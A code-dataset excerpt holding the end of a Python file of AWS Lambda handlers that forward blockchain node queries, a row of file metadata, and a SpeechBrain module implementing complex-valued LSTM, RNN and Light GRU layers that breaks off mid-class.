"""Get the token balance of a given address.
*IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
"""
node_api = node_api or NodeApi()
address = event.query.get("address")
if address is None:
raise ApiError("invalid_parameters")
response = node_api.get_address_balance(address)
return {
"statusCode": 200,
"body": json.dumps(response or UNKNOWN_ERROR_MSG),
"headers": {
"Content-Type": "application/json"
}
}
@ApiGateway()
def get_address_search(
event: ApiGatewayEvent,
_context: LambdaContext,
node_api: Optional[NodeApi] = None
) -> dict:
"""Get a paginated list of transactions for a given address.
*IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
"""
node_api = node_api or NodeApi()
address = event.query.get("address")
count = event.query.get("count")
page = event.query.get("page")
hash = event.query.get("hash")
token = event.query.get("token")
if address is None or count is None:
raise ApiError("invalid_parameters")
if hash is not None and page is None:
# If hash exists, it"s a paginated request and page is required
raise ApiError("invalid_parameters")
response = node_api.get_address_search(address, count, page, hash, token)
return {
"statusCode": 200,
"body": json.dumps(response or UNKNOWN_ERROR_MSG),
"headers": {
"Content-Type": "application/json"
}
}
@ApiGateway()
def get_version(
event: ApiGatewayEvent,
_context: LambdaContext,
node_api: Optional[NodeApi] = None
) -> dict:
"""Get the node version settings.
*IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
"""
node_api = node_api or NodeApi()
response = node_api.get_version()
return {
"statusCode": 200,
"body": json.dumps(response or UNKNOWN_ERROR_MSG),
"headers": {
"Content-Type": "application/json"
}
}
@ApiGateway()
def get_dashboard_tx(
event: ApiGatewayEvent,
_context: LambdaContext,
node_api: Optional[NodeApi] = None
) -> dict:
"""Get the txs and blocks to be shown on the dashboard.
*IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
"""
node_api = node_api or NodeApi()
block = event.query.get("block")
tx = event.query.get("tx")
if block is None or tx is None:
raise ApiError("invalid_parameters")
response = node_api.get_dashboard_tx(block, tx)
return {
"statusCode": 200,
"body": json.dumps(response or UNKNOWN_ERROR_MSG),
"headers": {
"Content-Type": "application/json"
}
}
@ApiGateway()
def get_transaction_acc_weight(
event: ApiGatewayEvent,
_context: LambdaContext,
node_api: Optional[NodeApi] = None
) -> dict:
"""Get a tx accumulated weight data.
*IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
"""
node_api = node_api or NodeApi()
id = event.query.get("id")
if id is None:
raise ApiError("invalid_parameters")
response = node_api.get_transaction_acc_weight(id)
return {
"statusCode": 200,
"body": json.dumps(response or UNKNOWN_ERROR_MSG),
"headers": {
"Content-Type": "application/json"
}
}
@ApiGateway()
def get_token_history(
event: ApiGatewayEvent,
_context: LambdaContext,
node_api: Optional[NodeApi] = None
) -> dict:
"""Get a paginated history of transactions for a given token id.
*IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
"""
node_api = node_api or NodeApi()
id = event.query.get("id")
count = event.query.get("count")
hash = event.query.get("hash")
page = event.query.get("page")
timestamp = event.query.get("timestamp")
if id is None or count is None:
raise ApiError("invalid_parameters")
if hash is not None and (page is None or timestamp is None):
# If hash exists, it"s a paginated request and page is required
raise ApiError("invalid_parameters")
response = node_api.get_token_history(id, count, hash, page, timestamp)
return {
"statusCode": 200,
"body": json.dumps(response or {}),
"headers": {
"Content-Type": "application/json"
}
}
@ApiGateway()
def get_transaction(
event: ApiGatewayEvent,
_context: LambdaContext,
node_api: Optional[NodeApi] = None
) -> dict:
"""Get transaction details given a tx_id.
*IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
"""
node_api = node_api or NodeApi()
id = event.query.get("id")
if id is None:
raise ApiError("invalid_parameters")
response = node_api.get_transaction(id)
return {
"statusCode": 200,
"body": json.dumps(response or UNKNOWN_ERROR_MSG),
"headers": {
"Content-Type": "application/json"
}
}
@ApiGateway()
def list_transactions(
event: ApiGatewayEvent,
_context: LambdaContext,
node_api: Optional[NodeApi] = None
) -> dict:
"""Get a pagination on blocks or transactions with details.
*IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
"""
node_api = node_api or NodeApi()
type = event.query.get("type")
count = event.query.get("count")
hash = event.query.get("hash")
page = event.query.get("page")
timestamp = event.query.get("timestamp")
if type is None or count is None:
raise ApiError("invalid_parameters")
if hash is not None and (page is None or timestamp is None):
# If hash exists, it"s a paginated request and page is required
raise ApiError("invalid_parameters")
response = node_api.list_transactions(type, count, hash, page, timestamp)
return {
"statusCode": 200,
"body": json.dumps(response or {}),
"headers": {
"Content-Type": "application/json"
}
}
@ApiGateway()
def get_token(
event: ApiGatewayEvent,
_context: LambdaContext,
node_api: Optional[NodeApi] = None
) -> dict:
"""Get token details given a token uid.
*IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
"""
node_api = node_api or NodeApi()
id = event.query.get("id")
if id is None:
raise ApiError("invalid_parameters")
response = node_api.get_token(id)
return {
"statusCode": 200,
"body": json.dumps(response or UNKNOWN_ERROR_MSG),
"headers": {
"Content-Type": "application/json"
}
}
@ApiGateway()
def list_tokens(
event: ApiGatewayEvent,
_context: LambdaContext,
node_api: Optional[NodeApi] = None
) -> dict:
"""Get a list of tokens with details.
*IMPORTANT: Any changes on the parameters should be reflected on the `cacheKeyParameters` for this method.
"""
node_api = node_api or NodeApi()
response = node_api.list_tokens()
return {
"statusCode": 200,
"body": json.dumps(response or {}),
"headers": {
"Content-Type": "application/json"
}
}
@ApiGateway()
def decode_tx(
event: ApiGatewayEvent,
_context: LambdaContext,
node_api: Optional[NodeApi] = None
) -> dict:
"""Decode a tx by it's struct data hex encoded."""
node_api = node_api or NodeApi()
hex_tx = event.query.get("hex_tx")
if hex_tx is None:
raise ApiError("invalid_parameters")
response = node_api.decode_tx(hex_tx)
return {
"statusCode": 200,
"body": json.dumps(response or {}),
"headers": {
"Content-Type": "application/json"
}
}
@ApiGateway()
def push_tx(
event: ApiGatewayEvent,
_context: LambdaContext,
node_api: Optional[NodeApi] = None
) -> dict:
"""Push a transaction by it's struct data hex encoded."""
node_api = node_api or NodeApi()
hex_tx = event.query.get("hex_tx")
if hex_tx is None:
raise ApiError("invalid_parameters")
response = node_api.push_tx(hex_tx)
return {
"statusCode": 200,
"body": json.dumps(response or {}),
"headers": {
"Content-Type": "application/json"
}
}
@ApiGateway()
def graphviz_dot_neighbors(
event: ApiGatewayEvent,
_context: LambdaContext,
node_api: Optional[NodeApi] = None
) -> dict:
"""Generate file with the graph of neighbours of a tx in dot format."""
node_api = node_api or NodeApi()
tx = event.query.get("tx")
graph_type = event.query.get("graph_type") # verification, funds
max_level = event.query.get("max_level")
if tx is None or graph_type is None or max_level is None:
raise ApiError("invalid_parameters")
response = node_api.graphviz_dot_neighbors(tx, graph_type, max_level)
return {
"statusCode": 200,
"body": response,
"headers": {
"Content-Type": "application/json"
}
}
| 27.288462 | 114 | 0.64029 | 1,197 | 9,933 | 5.182122 | 0.099415 | 0.05981 | 0.05449 | 0.067709 | 0.830727 | 0.802999 | 0.799291 | 0.799291 | 0.799291 | 0.781719 | 0 | 0.005249 | 0.251988 | 9,933 | 363 | 115 | 27.363636 | 0.82961 | 0.19098 | 0 | 0.71875 | 0 | 0 | 0.132066 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.050781 | false | 0 | 0.023438 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e8ed20d51b28395b6b895fe1fea73e9d3a4ad4c1 | 37,764 | py | Python | speechbrain/nnet/complex_networks/c_RNN.py | anonymspeechbrain/speechbrain | 9a0632ddb066f5bceffb71fb971552fb542f7b7e | [
"Apache-2.0"
] | null | null | null | speechbrain/nnet/complex_networks/c_RNN.py | anonymspeechbrain/speechbrain | 9a0632ddb066f5bceffb71fb971552fb542f7b7e | [
"Apache-2.0"
] | null | null | null | speechbrain/nnet/complex_networks/c_RNN.py | anonymspeechbrain/speechbrain | 9a0632ddb066f5bceffb71fb971552fb542f7b7e | [
"Apache-2.0"
] | null | null | null | """Library implementing complex-valued recurrent neural networks.
Authors
* Anonymous
"""
import torch
import logging
from speechbrain.nnet.complex_networks.c_linear import CLinear
from speechbrain.nnet.complex_networks.c_normalization import (
CBatchNorm,
CLayerNorm,
)
logger = logging.getLogger(__name__)
class CLSTM(torch.nn.Module):
""" This function implements a complex-valued LSTM.
Input format is (batch, time, fea) or (batch, time, fea, channel).
In the latter shape, the two last dimensions will be merged:
(batch, time, fea * channel)
Arguments
---------
hidden_size : int
Number of output neurons (i.e, the dimensionality of the output).
Specified value is in term of complex-valued neurons. Thus, the output
is 2*hidden_size.
num_layers : int, optional
Number of layers to employ in the RNN architecture (default 1).
bias: bool, optional
If True, the additive bias b is adopted (default True).
dropout : float, optional
It is the dropout factor (must be between 0 and 1) (default 0.0).
return_hidden : bool, optional
It True, the function returns the last hidden layer.
bidirectional : bool, optional
If True, a bidirectional model that scans the sequence both
right-to-left and left-to-right is used (default False).
init_criterion : str , optional
(glorot, he).
This parameter controls the initialization criterion of the weights.
It is combined with weights_init to build the initialization method of
the complex-valued weights (default "glorot").
weight_init : str, optional
(complex, unitary).
This parameter defines the initialization procedure of the
complex-valued weights (default "complex"). "complex" will generate random complex-valued
weights following the init_criterion and the complex polar form.
"unitary" will normalize the weights to lie on the unit circle.
More details in: "Deep Complex Networks", Trabelsi C. et al.
Example
-------
>>> inp_tensor = torch.rand([10, 16, 40])
>>> rnn = CLSTM(hidden_size=16, input_shape=inp_tensor.shape)
>>> out_tensor = rnn(inp_tensor)
>>>
torch.Size([10, 16, 32])
"""
def __init__(
self,
hidden_size,
input_shape,
num_layers=1,
bias=True,
dropout=0.0,
bidirectional=False,
return_hidden=False,
init_criterion="glorot",
weight_init="complex",
):
super().__init__()
self.hidden_size = hidden_size * 2
self.num_layers = num_layers
self.bias = bias
self.dropout = dropout
self.bidirectional = bidirectional
self.reshape = False
self.return_hidden = return_hidden
self.init_criterion = init_criterion
self.weight_init = weight_init
if len(input_shape) > 3:
self.reshape = True
# Computing the feature dimensionality
self.fea_dim = torch.prod(torch.tensor(input_shape[2:]))
self.batch_size = input_shape[0]
self.rnn = self._init_layers()
def _init_layers(self,):
"""
Initializes the layers of the ComplexLSTM.
Arguments
---------
first_input : tensor
A first input used for initializing the parameters.
"""
rnn = torch.nn.ModuleList([])
current_dim = self.fea_dim
for i in range(self.num_layers):
rnn_lay = CLSTM_Layer(
current_dim,
self.hidden_size,
self.num_layers,
self.batch_size,
dropout=self.dropout,
bidirectional=self.bidirectional,
init_criterion=self.init_criterion,
weight_init=self.weight_init,
)
rnn.append(rnn_lay)
if self.bidirectional:
current_dim = self.hidden_size * 2
else:
current_dim = self.hidden_size
return rnn
def forward(self, x, hx=None):
"""Returns the output of the CLSTM.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
# Reshaping input tensors for 4d inputs
if self.reshape:
if x.ndim == 4:
x = x.reshape(x.shape[0], x.shape[1], x.shape[2] * x.shape[3])
output, hh = self._forward_rnn(x, hx=hx)
if self.return_hidden:
return output, hh
else:
return output
def _forward_rnn(self, x, hx):
"""Returns the output of the CLSTM.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
h = []
if hx is not None:
if self.bidirectional:
hx = hx.reshape(
self.num_layers, self.batch_size * 2, self.hidden_size
)
# Processing the different layers
for i, rnn_lay in enumerate(self.rnn):
if hx is not None:
x = rnn_lay(x, hx=hx[i])
else:
x = rnn_lay(x, hx=None)
h.append(x[:, -1, :])
h = torch.stack(h, dim=1)
if self.bidirectional:
h = h.reshape(h.shape[1] * 2, h.shape[0], self.hidden_size)
else:
h = h.transpose(0, 1)
return x, h
class CLSTM_Layer(torch.nn.Module):
""" This function implements complex-valued LSTM layer.
Arguments
---------
input_size : int
Feature dimensionality of the input tensors (in term of real values).
batch_size : int
Batch size of the input tensors.
hidden_size : int
Number of output values (in term of real values).
num_layers : int, optional
Number of layers to employ in the RNN architecture (default 1).
dropout : float, optional
It is the dropout factor (must be between 0 and 1) (default 0.0).
bidirectional : bool, optional
If True, a bidirectional model that scans the sequence both
right-to-left and left-to-right is used (default False).
init_criterion : str, optional
(glorot, he).
This parameter controls the initialization criterion of the weights.
It is combined with weights_init to build the initialization method of
the complex-valued weights (default "glorot").
weight_init : str, optional
(complex, unitary).
This parameter defines the initialization procedure of the
complex-valued weights (default "complex"). "complex" will generate random complex-valued
weights following the init_criterion and the complex polar form.
"unitary" will normalize the weights to lie on the unit circle.
More details in: "Deep Complex Networks", Trabelsi C. et al.
"""
def __init__(
self,
input_size,
hidden_size,
num_layers,
batch_size,
dropout=0.0,
bidirectional=False,
init_criterion="glorot",
weight_init="complex",
):
super(CLSTM_Layer, self).__init__()
self.hidden_size = int(hidden_size) // 2 # Express in term of quat
self.input_size = int(input_size)
self.batch_size = batch_size
self.bidirectional = bidirectional
self.dropout = dropout
self.init_criterion = init_criterion
self.weight_init = weight_init
self.w = CLinear(
input_shape=self.input_size,
n_neurons=self.hidden_size * 4, # Forget, Input, Output, Cell
bias=True,
weight_init=self.weight_init,
init_criterion=self.init_criterion,
)
self.u = CLinear(
input_shape=self.hidden_size * 2, # The input size is in real
n_neurons=self.hidden_size * 4,
bias=True,
weight_init=self.weight_init,
init_criterion=self.init_criterion,
)
if self.bidirectional:
self.batch_size = self.batch_size * 2
# Initial state
self.h_init = torch.zeros(1, self.hidden_size * 2, requires_grad=False)
# Preloading dropout masks (gives some speed improvement)
self._init_drop(self.batch_size)
# Initializing dropout
self.drop = torch.nn.Dropout(p=self.dropout, inplace=False)
self.drop_mask_te = torch.tensor([1.0]).float()
def forward(self, x, hx=None):
# type: (Tensor, Optional[Tensor]) -> Tensor # noqa F821
"""Returns the output of the CRNN_layer.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
if self.bidirectional:
x_flip = x.flip(1)
x = torch.cat([x, x_flip], dim=0)
# Change batch size if needed
self._change_batch_size(x)
# Feed-forward affine transformations (all steps in parallel)
w = self.w(x)
# Processing time steps
if hx is not None:
h = self._complexlstm_cell(w, hx)
else:
h = self._complexlstm_cell(w, self.h_init)
if self.bidirectional:
h_f, h_b = h.chunk(2, dim=0)
h_b = h_b.flip(1)
h = torch.cat([h_f, h_b], dim=2)
return h
def _complexlstm_cell(self, w, ht):
"""Returns the hidden states for each time step.
Arguments
---------
wx : torch.Tensor
Linearly transformed input.
"""
hiddens = []
# Initialise the cell state
ct = self.h_init
# Sampling dropout mask
drop_mask = self._sample_drop_mask()
# Loop over time axis
for k in range(w.shape[1]):
gates = w[:, k] + self.u(ht)
(itr, iti, ftr, fti, otr, oti, ctr, cti) = gates.chunk(8, 1)
it = torch.sigmoid(torch.cat([itr, iti], dim=-1))
ft = torch.sigmoid(torch.cat([ftr, fti], dim=-1))
ot = torch.sigmoid(torch.cat([otr, oti], dim=-1))
ct = (
it * torch.tanh(torch.cat([ctr, cti], dim=-1)) * drop_mask
+ ft * ct
)
ht = ot * torch.tanh(ct)
hiddens.append(ht)
# Stacking hidden states
h = torch.stack(hiddens, dim=1)
return h
def _init_drop(self, batch_size):
"""Initializes the recurrent dropout operation. To speed it up,
the dropout masks are sampled in advance.
"""
self.drop = torch.nn.Dropout(p=self.dropout, inplace=False)
self.drop_mask_te = torch.tensor([1.0]).float()
self.N_drop_masks = 16000
self.drop_mask_cnt = 0
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2)
).data
def _sample_drop_mask(self,):
"""Selects one of the pre-defined dropout masks
"""
if self.training:
# Sample new masks when needed
if self.drop_mask_cnt + self.batch_size > self.N_drop_masks:
self.drop_mask_cnt = 0
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2,)
).data
# Sampling the mask
drop_mask = self.drop_masks[
self.drop_mask_cnt : self.drop_mask_cnt + self.batch_size
]
self.drop_mask_cnt = self.drop_mask_cnt + self.batch_size
else:
drop_mask = self.drop_mask_te
return drop_mask
def _change_batch_size(self, x):
"""This function changes the batch size when it is different from
the one detected in the initialization method. This might happen in
the case of multi-gpu or when we have different batch sizes in train
and test. We also update the h_int and drop masks.
"""
if self.batch_size != x.shape[0]:
self.batch_size = x.shape[0]
if self.training:
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2,)
).data
class CRNN(torch.nn.Module):
""" This function implements a vanilla complex-valued RNN.
Input format is (batch, time, fea) or (batch, time, fea, channel).
In the latter shape, the two last dimensions will be merged:
(batch, time, fea * channel)
Arguments
---------
hidden_size : int
Number of output neurons (i.e, the dimensionality of the output).
Specified value is in term of complex-valued neurons. Thus, the output
is 2*hidden_size.
num_layers : int, optional
Number of layers to employ in the RNN architecture (default 1).
nonlinearity : str, optional
Type of nonlinearity (tanh, relu) (default "tanh").
bias : bool, optional
If True, the additive bias b is adopted (default True).
dropout : float, optional
It is the dropout factor (must be between 0 and 1) (default 0.0).
return_hidden : bool, optional
It True, the function returns the last hidden layer (default False).
bidirectional : bool, optional
If True, a bidirectional model that scans the sequence both
right-to-left and left-to-right is used (default False).
init_criterion : str , optional
(glorot, he).
This parameter controls the initialization criterion of the weights.
It is combined with weights_init to build the initialization method of
the complex-valued weights (default "glorot").
weight_init : str, optional
(complex, unitary).
This parameter defines the initialization procedure of the
complex-valued weights (default "complex"). "complex" will generate random complex-valued
weights following the init_criterion and the complex polar form.
"unitary" will normalize the weights to lie on the unit circle.
More details in: "Deep Complex Networks", Trabelsi C. et al.
Example
-------
>>> inp_tensor = torch.rand([10, 16, 30])
>>> rnn = CRNN(hidden_size=16, input_shape=inp_tensor.shape)
>>> out_tensor = rnn(inp_tensor)
>>>
torch.Size([10, 16, 32])
"""
def __init__(
self,
hidden_size,
input_shape,
nonlinearity="tanh",
num_layers=1,
bias=True,
dropout=0.0,
bidirectional=False,
return_hidden=False,
init_criterion="glorot",
weight_init="complex",
):
super().__init__()
self.hidden_size = hidden_size * 2 # z = x + iy
self.nonlinearity = nonlinearity
self.num_layers = num_layers
self.bias = bias
self.dropout = dropout
self.bidirectional = bidirectional
self.reshape = False
self.return_hidden = return_hidden
self.init_criterion = init_criterion
self.weight_init = weight_init
if len(input_shape) > 3:
self.reshape = True
# Computing the feature dimensionality
self.fea_dim = torch.prod(torch.tensor(input_shape[2:]))
self.batch_size = input_shape[0]
self.rnn = self._init_layers()
def _init_layers(self,):
"""
Initializes the layers of the CRNN.
Arguments
---------
first_input : tensor
A first input used for initializing the parameters.
"""
rnn = torch.nn.ModuleList([])
current_dim = self.fea_dim
for i in range(self.num_layers):
rnn_lay = CRNN_Layer(
current_dim,
self.hidden_size,
self.num_layers,
self.batch_size,
dropout=self.dropout,
nonlinearity=self.nonlinearity,
bidirectional=self.bidirectional,
init_criterion=self.init_criterion,
weight_init=self.weight_init,
)
rnn.append(rnn_lay)
if self.bidirectional:
current_dim = self.hidden_size * 2
else:
current_dim = self.hidden_size
return rnn
def forward(self, x, hx=None):
"""Returns the output of the vanilla CRNN.
Arguments
---------
x : torch.Tensor
"""
# Reshaping input tensors for 4d inputs
if self.reshape:
if x.ndim == 4:
x = x.reshape(x.shape[0], x.shape[1], x.shape[2] * x.shape[3])
output, hh = self._forward_rnn(x, hx=hx)
if self.return_hidden:
return output, hh
else:
return output
def _forward_rnn(self, x, hx):
"""Returns the output of the vanilla CRNN.
Arguments
---------
x : torch.Tensor
"""
h = []
if hx is not None:
if self.bidirectional:
hx = hx.reshape(
self.num_layers, self.batch_size * 2, self.hidden_size
)
# Processing the different layers
for i, rnn_lay in enumerate(self.rnn):
if hx is not None:
x = rnn_lay(x, hx=hx[i])
else:
x = rnn_lay(x, hx=None)
h.append(x[:, -1, :])
h = torch.stack(h, dim=1)
if self.bidirectional:
h = h.reshape(h.shape[1] * 2, h.shape[0], self.hidden_size)
else:
h = h.transpose(0, 1)
return x, h
class CRNN_Layer(torch.nn.Module):
""" This function implements complex-valued recurrent layer.
Arguments
---------
input_size : int
Feature dimensionality of the input tensors (in term of real values).
batch_size : int
Batch size of the input tensors.
hidden_size : int
Number of output values (in term of real values).
num_layers : int, optional
Number of layers to employ in the RNN architecture (default 1).
nonlinearity : str, optional
Type of nonlinearity (tanh, relu) (default "tanh").
dropout : float, optional
It is the dropout factor (must be between 0 and 1) (default 0.0).
bidirectional : bool, optional
If True, a bidirectional model that scans the sequence both
right-to-left and left-to-right is used (default False).
init_criterion : str , optional
(glorot, he).
This parameter controls the initialization criterion of the weights.
It is combined with weights_init to build the initialization method of
the complex-valued weights (default "glorot").
weight_init : str, optional
(complex, unitary).
This parameter defines the initialization procedure of the
complex-valued weights (default "complex"). "complex" will generate random complex-valued
weights following the init_criterion and the complex polar form.
"unitary" will normalize the weights to lie on the unit circle.
More details in: "Deep Complex Networks", Trabelsi C. et al.
"""
def __init__(
self,
input_size,
hidden_size,
num_layers,
batch_size,
dropout=0.0,
nonlinearity="tanh",
bidirectional=False,
init_criterion="glorot",
weight_init="complex",
):
super(CRNN_Layer, self).__init__()
self.hidden_size = int(hidden_size) // 2 # Express in term of complex
self.input_size = int(input_size)
self.batch_size = batch_size
self.bidirectional = bidirectional
self.dropout = dropout
self.init_criterion = init_criterion
self.weight_init = weight_init
self.w = CLinear(
input_shape=self.input_size,
n_neurons=self.hidden_size,
bias=False,
weight_init=self.weight_init,
init_criterion=self.init_criterion,
)
self.u = CLinear(
input_shape=self.hidden_size * 2, # The input size is in real
n_neurons=self.hidden_size,
bias=False,
weight_init=self.weight_init,
init_criterion=self.init_criterion,
)
if self.bidirectional:
self.batch_size = self.batch_size * 2
# Initial state
self.h_init = torch.zeros(1, self.hidden_size * 2, requires_grad=False)
# Preloading dropout masks (gives some speed improvement)
self._init_drop(self.batch_size)
# Initializing dropout
self.drop = torch.nn.Dropout(p=self.dropout, inplace=False)
self.drop_mask_te = torch.tensor([1.0]).float()
# Setting the activation function
if nonlinearity == "tanh":
self.act = torch.nn.Tanh()
else:
self.act = torch.nn.ReLU()
def forward(self, x, hx=None):
# type: (Tensor, Optional[Tensor]) -> Tensor # noqa F821
"""Returns the output of the CRNN_layer.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
if self.bidirectional:
x_flip = x.flip(1)
x = torch.cat([x, x_flip], dim=0)
# Change batch size if needed
# self._change_batch_size(x)
# Feed-forward affine transformations (all steps in parallel)
w = self.w(x)
# Processing time steps
if hx is not None:
h = self._complexrnn_cell(w, hx)
else:
h = self._complexrnn_cell(w, self.h_init)
if self.bidirectional:
h_f, h_b = h.chunk(2, dim=0)
h_b = h_b.flip(1)
h = torch.cat([h_f, h_b], dim=2)
return h
def _complexrnn_cell(self, w, ht):
"""Returns the hidden states for each time step.
Arguments
---------
wx : torch.Tensor
Linearly transformed input.
"""
hiddens = []
# Sampling dropout mask
drop_mask = self._sample_drop_mask()
# Loop over time axis
for k in range(w.shape[1]):
at = w[:, k] + self.u(ht)
ht = self.act(at) * drop_mask
hiddens.append(ht)
# Stacking hidden states
h = torch.stack(hiddens, dim=1)
return h
def _init_drop(self, batch_size):
"""Initializes the recurrent dropout operation. To speed it up,
the dropout masks are sampled in advance.
"""
self.drop = torch.nn.Dropout(p=self.dropout, inplace=False)
self.drop_mask_te = torch.tensor([1.0]).float()
self.N_drop_masks = 16000
self.drop_mask_cnt = 0
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2,)
).data
def _sample_drop_mask(self,):
"""Selects one of the pre-defined dropout masks.
"""
if self.training:
# Sample new masks when needed
if self.drop_mask_cnt + self.batch_size > self.N_drop_masks:
self.drop_mask_cnt = 0
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2,)
).data
# Sampling the mask
drop_mask = self.drop_masks[
self.drop_mask_cnt : self.drop_mask_cnt + self.batch_size
]
self.drop_mask_cnt = self.drop_mask_cnt + self.batch_size
else:
drop_mask = self.drop_mask_te
return drop_mask
def _change_batch_size(self, x):
"""This function changes the batch size when it is different from
the one detected in the initialization method. This might happen in
the case of multi-gpu or when we have different batch sizes in train
and test. We also update the h_int and drop masks.
"""
if self.batch_size != x.shape[0]:
self.batch_size = x.shape[0]
if self.training:
self.drop_masks = self.drop(
torch.ones(self.N_drop_masks, self.hidden_size * 2,)
).data
class CLiGRU(torch.nn.Module):
""" This function implements a complex-valued Light GRU (liGRU).
Ligru is single-gate GRU model based on batch-norm + relu
activations + recurrent dropout. For more info see:
Anonymous
To speed it up, it is compiled with the torch just-in-time compiler (jit)
right before using it.
It accepts in input tensors formatted as (batch, time, fea).
In the case of 4d inputs like (batch, time, fea, channel) the tensor is
flattened as (batch, time, fea*channel).
Arguments
---------
hidden_size : int
Number of output neurons (i.e, the dimensionality of the output).
Specified value is in term of complex-valued neurons. Thus, the output
is 2*hidden_size.
nonlinearity : str
Type of nonlinearity (tanh, relu).
normalization : str
Type of normalization for the ligru model (batchnorm, layernorm).
Every string different from batchnorm and layernorm will result
in no normalization.
num_layers : int
Number of layers to employ in the RNN architecture.
bias : bool
If True, the additive bias b is adopted.
dropout : float
It is the dropout factor (must be between 0 and 1).
return_hidden : bool
If True, the function returns the last hidden layer.
bidirectional : bool
If True, a bidirectional model that scans the sequence both
right-to-left and left-to-right is used.
init_criterion : str , optional
(glorot, he).
This parameter controls the initialization criterion of the weights.
It is combined with weights_init to build the initialization method of
the complex-valued weights (default "glorot").
weight_init : str, optional
(complex, unitary).
This parameter defines the initialization procedure of the
complex-valued weights (default "complex"). "complex" will generate random complex-valued
weights following the init_criterion and the complex polar form.
"unitary" will normalize the weights to lie on the unit circle.
More details in: "Deep Complex Networks", Trabelsi C. et al.
Example
-------
>>> inp_tensor = torch.rand([10, 16, 30])
>>> rnn = CLiGRU(input_shape=inp_tensor.shape, hidden_size=16)
>>> out_tensor = rnn(inp_tensor)
>>>
torch.Size([4, 10, 5])
"""
def __init__(
self,
hidden_size,
input_shape,
nonlinearity="relu",
normalization="batchnorm",
num_layers=1,
bias=True,
dropout=0.0,
bidirectional=False,
return_hidden=False,
init_criterion="glorot",
weight_init="complex",
):
super().__init__()
self.hidden_size = hidden_size * 2 # z = x + iy
self.nonlinearity = nonlinearity
self.num_layers = num_layers
self.normalization = normalization
self.bias = bias
self.dropout = dropout
self.bidirectional = bidirectional
self.reshape = False
self.return_hidden = return_hidden
self.init_criterion = init_criterion
self.weight_init = weight_init
if len(input_shape) > 3:
self.reshape = True
self.fea_dim = torch.prod(torch.tensor(input_shape[2:]))
self.batch_size = input_shape[0]
self.rnn = self._init_layers()
def _init_layers(self):
"""Initializes the layers of the liGRU.
Arguments
---------
first_input : tensor
A first input used for initializing the parameters.
"""
rnn = torch.nn.ModuleList([])
current_dim = self.fea_dim
for i in range(self.num_layers):
rnn_lay = CLiGRU_Layer(
current_dim,
self.hidden_size,
self.num_layers,
self.batch_size,
dropout=self.dropout,
nonlinearity=self.nonlinearity,
normalization=self.normalization,
bidirectional=self.bidirectional,
init_criterion=self.init_criterion,
weight_init=self.weight_init,
)
rnn.append(rnn_lay)
if self.bidirectional:
current_dim = self.hidden_size * 2
else:
current_dim = self.hidden_size
return rnn
def forward(self, x, hx=None):
"""Returns the output of the CliGRU.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
# Reshaping input tensors for 4d inputs
if self.reshape:
if x.ndim == 4:
x = x.reshape(x.shape[0], x.shape[1], x.shape[2] * x.shape[3])
# run ligru
output, hh = self._forward_ligru(x, hx=hx)
if self.return_hidden:
return output, hh
else:
return output
def _forward_ligru(self, x, hx):
"""Returns the output of the CliGRU.
Arguments
---------
x : torch.Tensor
Input tensor.
"""
h = []
if hx is not None:
if self.bidirectional:
hx = hx.reshape(
self.num_layers, self.batch_size * 2, self.hidden_size
)
# Processing the different layers
for i, ligru_lay in enumerate(self.rnn):
if hx is not None:
x = ligru_lay(x, hx=hx[i])
else:
x = ligru_lay(x, hx=None)
h.append(x[:, -1, :])
h = torch.stack(h, dim=1)
if self.bidirectional:
h = h.reshape(h.shape[1] * 2, h.shape[0], self.hidden_size)
else:
h = h.transpose(0, 1)
return x, h
class CLiGRU_Layer(torch.nn.Module):
"""
This function implements complex-valued Light-Gated Recurrent Unit layer.
Arguments
---------
input_size : int
Feature dimensionality of the input tensors.
batch_size : int
Batch size of the input tensors.
hidden_size : int
Number of output values.
num_layers : int
Number of layers to employ in the RNN architecture.
nonlinearity : str
Type of nonlinearity (tanh, relu).
normalization : str
Type of normalization (batchnorm, layernorm).
Every string different from batchnorm and layernorm will result
in no normalization.
dropout : float
It is the dropout factor (must be between 0 and 1).
bidirectional : bool
If True, a bidirectional model that scans the sequence both
right-to-left and left-to-right is used.
init_criterion : str , optional
(glorot, he).
This parameter controls the initialization criterion of the weights.
It is combined with weights_init to build the initialization method of
the complex-valued weights (default "glorot").
weight_init : str, optional
(complex, unitary).
This parameter defines the initialization procedure of the
complex-valued weights (default "complex"). "complex" will generate random complex-valued
weights following the init_criterion and the complex polar form.
"unitary" will normalize the weights to lie on the unit circle.
More details in: "Deep Complex Networks", Trabelsi C. et al.
"""
def __init__(
self,
input_size,
hidden_size,
num_layers,
batch_size,
dropout=0.0,
nonlinearity="relu",
normalization="batchnorm",
bidirectional=False,
init_criterion="glorot",
weight_init="complex",
):
super(CLiGRU_Layer, self).__init__()
self.hidden_size = int(hidden_size) // 2
self.input_size = int(input_size)
self.batch_size = batch_size
self.bidirectional = bidirectional
self.dropout = dropout
self.init_criterion = init_criterion
self.weight_init = weight_init
self.normalization = normalization
